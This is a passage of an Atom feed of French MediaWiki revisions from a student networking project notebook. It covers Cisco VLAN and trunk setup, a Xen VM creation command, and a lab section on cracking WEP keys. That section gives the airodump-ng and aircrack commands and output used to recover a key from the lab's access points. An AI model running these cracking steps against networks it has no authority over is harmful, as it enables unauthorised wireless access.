Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34807</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34807"/>
				<updated>2016-10-24T09:50:42Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Configuration du 6006 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34418</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34418"/>
				<updated>2016-10-13T09:33:53Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	</feed>